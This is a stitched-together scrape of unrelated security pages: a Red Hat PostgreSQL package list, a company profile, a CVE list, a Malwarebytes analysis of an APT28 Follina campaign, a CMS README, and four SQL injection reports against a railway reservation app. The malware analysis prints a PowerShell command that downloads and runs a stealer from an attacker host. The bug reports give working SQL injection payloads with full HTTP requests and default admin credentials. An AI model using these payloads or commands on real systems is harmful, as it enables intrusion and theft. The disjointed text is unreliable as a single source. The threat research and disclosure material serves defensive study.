SHA-256: c250da1b25c6eeb522da44a559b1f52a316abac88e304ec7343b8b0b2ac39c89

postgresql-devel-9.2.24-8.el7\_9.ppc.rpm

SHA-256: ae1c71e1c225a4942d85d2b933493975eae2a9b83b27d29cf258e5a08abfb7c1

postgresql-devel-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: b187ada5815b9177b64ee7fbc8cd030923c3369ce3557b95baafedc5b4ed5b4d

postgresql-docs-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: 73f6e47aa7664d39bb87bf18b4bb90c2c500418237abf2b291593b62f0a58afc

postgresql-libs-9.2.24-8.el7\_9.ppc.rpm

SHA-256: 016b98238a9e08eb27c32dcc6b1a783338c7bd784c86a1a5fc7f1e251e273804

postgresql-libs-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: 05e9b2f0559cc33755a51164b71fb4a3f7008ccf8ecb7914539b67e307bcde6d

postgresql-plperl-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: 4cc5f3421ec8a95c81cae2379e198ad067eaa7c0a7947e1379b79c5d51ad46bb

postgresql-plpython-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: 71a4f650f40c343bd32abe07cfbf8f9bbc6cf8fa2feea837cab09b8e2fb75e9c

postgresql-pltcl-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: cd560e19a7e9f02d4114e1ac4b86d418280b5dbe033e50163219c1fa2939ae28

postgresql-server-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: 2893b748323b952750af411b81096613e3e72b6e2e4c3635964165303f6635f7

postgresql-static-9.2.24-8.el7\_9.ppc.rpm

SHA-256: 6e2a7e054774775ee5d55da099c6999cd846e2a7213e5e0a2d6c287f4e170dd4

postgresql-static-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: 494fa6db7c0e6fabf23217de5cca2dea46d84bdc2fcf0ccdbde23d29c53d52f0

postgresql-test-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: fb036395bdaaed31821694c844486a381ef4ae50a05b59f881f21367d642a7c1

postgresql-upgrade-9.2.24-8.el7\_9.ppc64.rpm

SHA-256: 87657fa3d12c482deee83f27fb2a15279b3d755c7df09ae0d75375f37b6e4433

**Red Hat Enterprise Linux for Scientific Computing 7**

SRPM

postgresql-9.2.24-8.el7\_9.src.rpm

SHA-256: 7fa2adb59969ede74c2915a409f1e8d8f126660f652ab2a7a5d74aee5200c47e

x86\_64

postgresql-9.2.24-8.el7\_9.i686.rpm

SHA-256: f75e69d7b581e0e0900847d9d03ec5197c0ba439d4e2b5d505c826f991c731ff

postgresql-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 25e6031f1db68adae171dd770312cbb0e159027c424686465fb71d3de2897455

postgresql-contrib-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f366587793acea03272f9f209f3536de41a886b68ad4f0b1e42a7de2f35f9f68

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.i686.rpm

SHA-256: c0529df7e67dadb51555bbc1fa3c2ce9e5517b9975f8b9981429d21881dd8ac0

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-debuginfo-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: c5263add7d6998ea0da9aa4b91e9453b0dd04a6a319de20edc8a2a96db02eda2

postgresql-devel-9.2.24-8.el7\_9.i686.rpm

SHA-256: 346157bc04520d78348b279fbe2d58d8a70241c1cd9d12fd5644a8e860505df1

postgresql-devel-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: f4fda1a21c23825fc6054bc3bd182aaa776e0d83ea36fbed4f0a3ded69b89f88

postgresql-docs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: e1f63d369ca685c4113dfba36184cf7a916d4890f504251ddfd641b5b60e04c5

postgresql-libs-9.2.24-8.el7\_9.i686.rpm

SHA-256: ed9a3875ea18b8ee2edb25ee984417c3a4f9738cbb92ab91e49beb9c4728eeea

postgresql-libs-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: aed7a9ab1b4612f3740e95ea39e703e51d3e901b3ab172884556298a8044274d

postgresql-plperl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 45fc73cff40ede890418eaf40632d32261be52087785f9c57879b446f38f396d

postgresql-plpython-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 42d9ca3c8b6ef4f99281a3d231be6aaa15cc46d04ee1e89411fafd66259d487c

postgresql-pltcl-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 62b4a33524643d4aa09a00e1522bcbfc517bef0e08652db7f98148c4cd17ec93

postgresql-server-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: bc9807f250a68d809ada1366478cdfdef4faa50602440b7f5f4cb0b0fa61666b

postgresql-static-9.2.24-8.el7\_9.i686.rpm

SHA-256: a60143859d1ff960530a2541de3c2cc62c3e215a51627534b0327710a99e6bbc

postgresql-static-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 735b560b101fa676594b261a812581ddf81404b92c92dc66091c78eb8478924c

postgresql-test-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 08700ec5989a22a08c54dd0d9856f8db1c53c2b8775f4113f996b13607136ce0

postgresql-upgrade-9.2.24-8.el7\_9.x86\_64.rpm

SHA-256: 9a9898c1b60eb2ce19b98f3a39b3ab0b5c4cce0ae8bf248cb1ceb3cf6c916f0f

**Red Hat Enterprise Linux for Power, little endian 7**

SRPM

postgresql-9.2.24-8.el7\_9.src.rpm

SHA-256: 7fa2adb59969ede74c2915a409f1e8d8f126660f652ab2a7a5d74aee5200c47e

ppc64le

postgresql-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 6f7f760a7846f6319def39a738f550753ee53b187130d9c9fcc221ff3cd73f8d

postgresql-contrib-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 3a3ff1caeaf0c32ba4fbdfa7c26606afbb9238e31c9902877a7ad598032bca33

postgresql-debuginfo-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 2872e92218d94f61c8539e17c8d1e0289db2e54af7c0ff0d18759c61ef45efe8

postgresql-debuginfo-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 2872e92218d94f61c8539e17c8d1e0289db2e54af7c0ff0d18759c61ef45efe8

postgresql-devel-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 830bf4a124b123bac338fae1f3aa313d06e43504c75aef4246ca92823f406107

postgresql-docs-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 6483e61b0e2a4f22c20f4bf638fb58a7462e0bfbab3a72a203a3f414e0754ed3

postgresql-libs-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 7f905fb1cb6002bb9194871461a15f65461ab3d87679b65f38a034a55edf65b4

postgresql-plperl-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 939998b45b90bf6d65313dff974176ebaf21ba6bb40b57ce6e7a362e1b98cbde

postgresql-plpython-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 0dd8a38cae9af83aff5a6930fe060768d9d3c4e936cb04e6f4915918c9b5f7f3

postgresql-pltcl-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: db1b0923c7de674570857106a38330159d889b2af91041c5f44684d86501c998

postgresql-server-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 7e96da6582d4fa284f57c6a4d816c9f21081b26824bd8047db7cae0065fc9547

postgresql-static-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: 57111635209755d9a828f9079f0483569ba175d67d6e07ad5166a1f3d22211c5

postgresql-test-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: a06c0d52d685fa92ef3ebb44cf7737036276c22ac0a75dbcff93e18a5d010e09

postgresql-upgrade-9.2.24-8.el7\_9.ppc64le.rpm

SHA-256: d7d85fd882931c7ae802aefc7f52f77ed2ecc9eee28e2cb17698b19624bd0810

RHSA-2022:5162: Red Hat Security Advisory: postgresql security update

OBDA systems’ Mastro 1.0 is vulnerable to XML Entity Expansion (aka “billion laughs”) attack allowing denial of service.

**01**

****About Us.****

**We provide state-of-the-art solutions based on the most recent breakthroughs in the field of semantic technologies, to enable a direct and effective management of enterprise data.**

**We support organizations in dealing with the challenges of data governance, production, and management through solutions based on the groundbreaking Ontology-based Data Management technology.**

**OBDA Systems is an innovation startup of Sapienza University of Rome, and a company of the Almawave Group.**

****02********Ontology-based Data**  
**Management********A three-level data virtualization technology that allows data access, integration, quality checking, and governance through an ontology or a knowledge graph.****

**The Ontology Layer**

**A knowledge graph that describes the business domain: a user-friendly, machine-readable model of enterprise data.**

**A high-level representation of the business domain through which the data is accessed.**

**Data access, integration, and quality checking are enhanced by exploiting automatic reasoning capabilities over the graph**.

**The Mapping Layer**

**Semantic Links between the ontology and the enterprise data sources**.

**SQL queries on the databases are connected to the ontology entities to enable virtual data access.**

**The mappings allow separation of the physical data structure from the ontology model, and bridge the semantic gap between the two.**

**The Data Layer**

**Enterprise data sources and applications.**

**No new custom databases are required. No ETL processes. Zero impact on the pre-existing enterprise data layer.**

**Pay-as-you-go model: connect new data sources to the ontology by mapping them to instantly gain integration.**

****Simple****

**Access data through simple business questions over the ontology, regardless of where and how the data is stored.**

****Efficient****

**Reduces turn-around-time for key business decisions and drops the cost of querying the data.**

**Agile**

**The virtual data-to-ontology mappings require no ETL processes or custom database restructuring.**

**Flexible**

**A pay-as-you-go approach to building the ontology and mapping the data for any business use case.**

03

****Solutions****

**Simplifying data governance, boosting information management services, and getting the best out of your data.**

**Semantic Data Access and Integration**

******The ontological representation of the enterprise data simplifies the work of the domain experts, who can use business concepts to interact with integrated data sources for the purpose of data governance and analytics.******

**Enterprise Knowledge Graphs**

****Knowledge Graphs and ontologies give meaning to enterprise data through the business language.  
OBDA Systems provides tools and expertise that help organizations build and maintain their own Enterprise Knowledge Graphs.****

**Data Quality Checking and Governance**

********The ontology provides the business rules to measure the quality of enterprise data. OBDA System’s tools leverage these rules to help identify and correct data quality issues, and improve the value and reliability of the enterprise data sources**.******

**Preparation and Publication of 5\* Linked Open Data**

************Preparation, annotation and publication of 5 star Linked Open Data through a simple query-driven pipeline. Support for W3C standards, data lineage tracing, privacy and protection management through the ontology model.************

**0**4

****Products****

****The Mastro Suite: OBDM tools for the end-user and the designer.****

****The motor behind OBDM: an ontology reasoning system with virtual query answering capabilities over enterprise data sources and automatic data quality verification with respect to the ontology business rules.****

****The Semantic Knowledge Graph Platform: Monolith is the gateway to accessing Mastro’s features, while also allowing ontology exploration, knowledge graph creation, data mapping visualization and editing.****

****An Open Source, free-to-use, completely graphical ontology editor with syntactic and semantic reasoning capabilities, to ensure quick, safe, and easy ontology creation.****

**05**

****Our Team**  
**

****Maurizio Lenzerini****

**Co-Founder & President**

****Raniero Romagnoli****

**CEO**

****Valerio Santarelli****

**Co-Founder & CTO**

****Marco Ruzzi****

**Co-Founder & Lead Developer**

****Lorenzo Lepore****

**Co-Founder & Senior R&D Engineer**

****Giacomo Ronconi****

**Senior R&D Engineer**

****Giuseppe De Giacomo****

**Co-Founder & Scientific Advisor**

****Domenico Lembo****

**Co-Founder & Scientific Advisor**

****Antonella Poggi****

**Co-Founder & Scientific Advisor**

****Domenico Fabio Savo****

****Co-Founder & Scientific Advisor****

We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies. However, you may visit "Cookie Settings" to provide a controlled consent.

CVE-2021-40511: Home - OBDA Systems

The GeoAnalytics feature in Qlik Sense April 2020 patch 4 allows SSRF.

**CVE-2021-41594**

RSA Archer

RSA Archer 6.9.SP1 P3 suffer of a privilege escalation vulnerability letting administrators access presumibily inaccessible functionalities.

**CVE-2021-40511**

Mastro – OBDA systems

OBDA systems’ Mastro 1.0 is vulnerable to XML Entity Expansion (aka “billion laughs”) attack allowing denial of service.

**CVE-2021-40510**

Mastro – OBDA systems

XML eXternal Entity (XXE) in OBDA systems’ Mastro 1.0 allows remote attackers to read system files via custom DTDs.

**CVE-TBA-01**

Liferay Portal

Cross-site scripting (XSS) vulnerability in the Gogo Shell module in Liferay Portal 7.1.0 through 7.3.6 and 7.4.0 allows remote attackers to inject arbitrary web script or HTML via the output of a Gogo Shell command.

**CVE-2021-36761**

Qlik Sense

The GeoAnalytics feature in Qlik Sense April 2020 patch 4 allows remote attackers to perform internal port scanning via SSRF.

**CVE-2021-36760**

WSO2 Identity Server

DOM-based XSS attack in WSO2 Identity Server 5.7.0 allows remote attackers to inject arbitrary web script in password reset procedure. This vulnerability can be used to perform Open Redirection attacks too.

**CVE-2020-23488**

L.E.F Radio Web Streamer

Blind Command Injection in L.E.F. srl Radio Web Streamer 1.0 allows an  
authenticated attacker to execute arbitrary command on the target system via specially crafted HTTP POST request.

**CVE-2020-23487**

L.E.F Radio Web Streamer

Arbitrary File Upload in L.E.F. srl Radio Web Streamer 1.0 allows an  
authenticated attacker to upload arbitrary file on the target system, hence  
executing arbitrary command by uploading a PHP file.

**CVE-2020-23486**

L.E.F Radio Web Streamer

Unauthenticated Command Injection in L.E.F. srl Radio Web Streamer 1.0 allows  an attacker to execute arbitrary command on the target system.

**CVE-2020-14608**

Oracle Fusion Middleware MapViewer

This vulnerability allows unauthenticated attacker with network access via HTTP to create, delete, edit critical data and read accessible data.

**CVE-2020-14607**

Oracle Fusion Middleware MapViewer

This vulnerability allows unauthenticated attacker with network access via HTTP to update, insert, delete and partially read accessible data.

**CVE-2020-14997**

ASiM – Archimista

An Insecure Direct Object Reference (IDOR) in Archimista 3.1.0 allows authenticated attacker to read and export all the reports in the application.

**CVE-2020-14996**

ASiM – Archimista

An arbitrary file read in Archimista 3.1.0 allows remote attacker to read arbitrary files on the file system.

**CVE-2020-14995**

ASiM – Archimista

A SQL injection in Archimista 3.1.0 allows remote attacker to execute arbitrary query on the database via the “term” parameter.

**CVE-2020-14994**

ASiM – Archimista

A SQL injection in Archimista 3.1.0 allows remote attacker to execute arbitrary query on the database via the “order” parameter.

**CVE-2020-10785**

Targa Telematics

**CVE-2020-10784**

Targa Telematics

**CVE-2019-19866**

Atos Unify OpenScape UC Application

Atos Unify OpenScape UC Web Client V9 before version V9 R4.31.0 and V10 before version V10 R0.6.0 allows remote attackers to obtain sensitive information. By iterating the value of conferenceId to getMailFunction in the JSON API, one can enumerate all conferences scheduled on the platform, with their numbers and access PINs.

**CVE-2019-19865**

Atos Unify OpenScape UC Application

Atos Unify OpenScape UC Application V9 before version V9 R4.31.0 and V10 before version V10 R0.6.0 allows XSS. An attacker could exploit this by convincing an authenticated user to inject arbitrary JavaScript code in the Profile Name field. A browser would execute this stored XSS payload.

**CVE-2019-17227**

Atos Unify OpenScape UC Application

CVE-2021-36761: Advisory - Joshua CybeRiskVision

Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.
The post Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine appeared first on Malwarebytes Labs.

_This blog post was authored by Hossein Jazi and Roberto Santos_.

In a recent campaign, APT28, an advanced persistent threat actor linked with Russian intelligence, set its sights on Ukraine, targeting users with malware that steals credentials stored in browsers.

APT28 (also known as Sofacy and Fancy Bear) is a notorious Russian threat actor that has been active since at least 2004 with its main activity being collecting intelligence for the Russian government. The group is known to have targeted US politicians, and US organizations, including US nuclear facilities.

On June 20, 2022, Malwarebytes Threat Intelligence identified a document that had been weaponized with the Follina (CVE-2022-30190) exploit to download and execute a new .Net stealer first reported by Google. The discovery was also made independently by CERT-UA.

Follina is a recently-discovered zero-day exploit that uses the ms-msdt protocol to load malicious code from Word documents when they are opened. This is the first time we’ve observed APT28 using Follina in its operations.

**The malicious document**

The maldoc’s filename, Nuclear Terrorism A Very Real Threat.rtf, attempts to get victims to open it by preying on their fears that the invasion of Ukraine will escalate into a nuclear conflict.

The content of the document is an article from the Atlantic Council called “_Will Putin use nuclear weapons in Ukraine? Our experts answer three burning questions_” published on May 10 this year.

The lure asks “Will Putin use nuclear weapons in Ukraine?”

The maldoc is an RTF file compiled on June 10, which suggests that the attack was used around the same time. It uses a remote template embedded in the Document.xml.rels file to retrieve a remote HTML file from the URL http://kitten-268.frge.io/article.html.

The malicious HTML document

The HTML file uses a JavaScript call to window.location.href to load and execute an encoded PowerShell script using the ms-msdt MSProtocol URI scheme. The decoded script uses cmd to run PowerShell code that downloads and executes the final payload:

    "C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

**Payload Analysis**

The final payload is a variant of a stealer APT28 has used against targets in Ukraine before. In the oldest variant, the stealer used a fake error message to hide what it was doing (A secondary thread was displaying this error message while the main program continued executing.) The new variant does not show the popup.

In older versions of the stealer, a fake error message distracted users

The variant used in this attack is almost identical to the one reported by Google, with just a few minor refactors and some additional sleep commands.

A side-by-side comparison of two versions of the APT28 stealer

As with the previous variant, the stealer’s main pupose is to steal data from several popular browsers.

**Google Chrome and Microsoft Edge**

The malware steals any website credentials (username, password, and url) users have saved in the browser by reading the contents of %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Debugging session showing how attackers are capable of stealing credentials

In a very similar way, the new variant also grabs all the saved cookies stored in Google Chrome by accessing %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Cookie stealing code (Google Chrome)

Stolen cookies can sometimes be used to break into websites even if the username and password aren’t saved to the browser.

The code to steal cookies and passwords from the Chromium-based Edge browser is almost identical to the code used for Chrome.

**Firefox**

This malware can also steal data from Firefox. It does this by iterating through every profile looking for the cookies.sqlite file that stores the cookies for each user.

Sysmon capturing access to cookies.sqlite file

In the case of passwords, the attackers attempt to steal logins.json, key3.db, key4.db, cert8.db, cert9.db, signons.sqlite.

Attackers will grab also passwords from Firefox

These files are necessary for recovering elements like saved passwords and certificates. Old versions are also supported (signons.sqlite, key3.db and cert8.db are no longer used by new Firefox versions). Note that if the user has set a master password, the attackers will likely attempt to crack this password offline, later, to recover these credentials.

**Exfiltrating data**

The malware uses the IMAP email protocol to exfiltrate data to its command and control (C2) server.

The IMAP login event

The old variant of this stealer connected to mail\[.\]sartoc.com (144.208.77.68) to exfiltrate data. The new variant uses the same method but a different domain, www.specialityllc\[.\]com. Interestingly both are located in Dubai.

It’s likely the owners of the C2 websites have nothing to do with APT28, and the group simply took advantage of abandoned or vulnerable sites.

Although ransacking browsers might look like petty theft, passwords are the key to accessing sensitive information and intelligence. The target, and the involvement of APT28, a division of Russian military intelligence), suggests that campaign is a part of the conflict in Ukraine, or at the very least linked to the foreign policy and military objectives of the Russian state. Ukraine continues to be a battleground for cyberattacks and espionage, as well as devastating kinetic warfare and humanitarian abuses.

For more coverage of threat actors active in the Ukraine conflict, read our recent article about the efforts of an unknown APT group that has targeted Russia repeatedly since Ukraine invasion.

**Protection**

Malwarebytes customers were proactively protected against this campaign thanks to our anti-exploit protection.

**IOCs**

**Maldoc:  
**Nuclear Terrorism A Very Real Threat.rtf  
daaa271cee97853bf4e235b55cb34c1f03ea6f8d3c958f86728d41f418b0bf01

**Remote template (Follina):  
**http://kitten-268.frge\[.\]io/article.html

**Stealer:  
**http://kompartpomiar\[.\]pl/grafika/docx.exe  
2318ae5d7c23bf186b88abecf892e23ce199381b22c8eb216ad1616ee8877933

**C2:  
**www.specialityllc\[.\]com

Russia’s APT28 uses fear of nuclear war to spread Follina docs in Ukraine

There is a Cross Site Scripting Stored (XSS) vulnerability in NukeViet CMS before 4.5.02.

**Introduction about NukeViet**

NukeViet is the first opensource CMS in Vietnam. The lastest version - NukeViet 4 coding ground up support lastest web technologies, include reponsive web design (use HTML 5, CSS 3, Composer, XTemplate), jQuery, Ajax...) enables you to build websites and online applications rapidly.

With it own core libraries built in, NukeViet 4 is cross platforms and frameworks independent. By basic knowledge of PHP and MySQL, you can easily extend NukeViet for your purposes.

NukeViet core is simply but powerful. It supports abstract modules which can be duplicate. So, it helps you create automatically many modules without any line of code from existing abstract modules.

NukeViet supports installing automatically modules, blocks, themes at Admin Control Panel and supports packing features which allow you to share your modules to web- community.

NukeViet fully supports multi-languages for internationalization and localization. Not only multi-interface languages but also multi-database languages are supported. NukeViet supports you to build new languages which are not distributed by NukeViet.

Detailed information about Nukeviet at Wikipedia Encyclopedia: http://vi.wikipedia.org/wiki/NukeViet

**Licensing**

NukeViet is released under GNU/GPL version 2 or any later version.

See LICENSE for the full license.

**NukeViet official website**

*   Home page - link to all resources NukeViet: http://nukeviet.vn (select Vietnamese to have the latest information).
*   NukeViet official Coding: http://code.nukeviet.vn
*   Theme, Module and more add-ons for NukeViet: http://nukeviet.vn/vi/store/
*   NukeViet official Forum http://forum.nukeviet.vn/
*   Open Document Library for NukeViet: http://wiki.nukeviet.vn/
*   NukeViet Translate Center: http://translate.nukeviet.vn/
*   NukeViet partner: http://nukeviet.vn/vi/partner/
*   NukeViet Education Center: http://nukeviet.edu.vn
*   NukeViet SaaS: http://nukeviet.com (testing)

**Community**

*   NukeViet Fanpage: http://facebook.com/nukeviet
*   NukeViet group on FB: https://www.facebook.com/groups/nukeviet/
*   http://twitter.com/nukeviet
*   https://groups.google.com/forum/?fromgroups#!forum/nukeviet
*   https://www.youtube.com/c/nukeviet

**NukeViet Centre for Research and Development**

VIETNAM OPEN SOURCE DEVELOPMENT JOINT STOCK COMPANY (VINADES.,JSC)

Website: http://vinades.vn | http://nukeviet.vn | http://nukeviet.com

Head Office:

*   Room 1706 - CT2 Nang Huong Building, 583 Nguyen Trai st, Ha Dong dist, Hanoi, Vietnam.
*   Phone: +84-24-85872007, Fax: +84-24-35500914, Email: contact (at) vinades.vn

CVE-2022-30874: GitHub - nukeviet/nukeviet: NukeViet CMS is multi Content Management System. NukeViet CMS is the 1st open source content management system in Vietnam. NukeViet was awarded the Vietnam Talent 2011, the

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /orrs/admin/schedules/manage_schedule.php.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/admin/schedules/manage\_schedule.php?id=

Vulnerability location: /orrs/admin/schedules/manage\_schedule.php?id=, id

Current database name: orrs\_db,length is 7

\[+\] Payload: /orrs/admin/schedules/manage\_schedule.php?id=-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /orrs/admin/schedules/manage\_schedule.php?id\=\-1%27%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close

CVE-2022-33056: bug_report/SQLi-4.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /orrs/admin/trains/manage_train.php.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/admin/trains/manage\_train.php?id=

Vulnerability location: /orrs/admin/trains/manage\_train.php?id=, id

Current database name: orrs\_db,length is 7

\[+\] Payload: /orrs/admin/trains/manage\_train.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /orrs/admin/trains/manage\_train.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close

CVE-2022-33055: bug_report/SQLi-3.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /orrs/admin/?page=user/manage_user.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/admin/?page=user/manage\_user&id=

Vulnerability location: /orrs/admin/?page=user/manage\_user&id=, id

Current database name: orrs\_db,length is 7

\[+\] Payload: /orrs/admin/?page=user/manage\_user&id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /orrs/admin/?page\=user/manage\_user&id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close

When length (database ()) = 6, Content-Length: 26098 

When length (database ()) = 7, Content-Length: 25858

CVE-2022-33049: bug_report/SQLi-2.md at main · k0xx11/bug_report

Online Railway Reservation System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /orrs/admin/reservations/view_details.php.

**Online Railway Reservation System v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html

Vulnerability File: /orrs/admin/reservations/view\_details.php?id=

Vulnerability location: /orrs/admin/reservations/view\_details.php?id=, id

Current database name: orrs\_db,length is 7

\[+\] Payload: /orrs/admin/reservations/view\_details.php?id=8%20and%20length(database())=7 // Leak place ---> id

GET /orrs/admin/reservations/view\_details.php?id\=8%20and%20length(database())\=7 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hea24clorqs9kplqalqihp0ik4
Connection: close

When length (database ()) = 6, Content-Length: 1943 

When length (database ()) = 7, Content-Length: 4116

Tag

#sql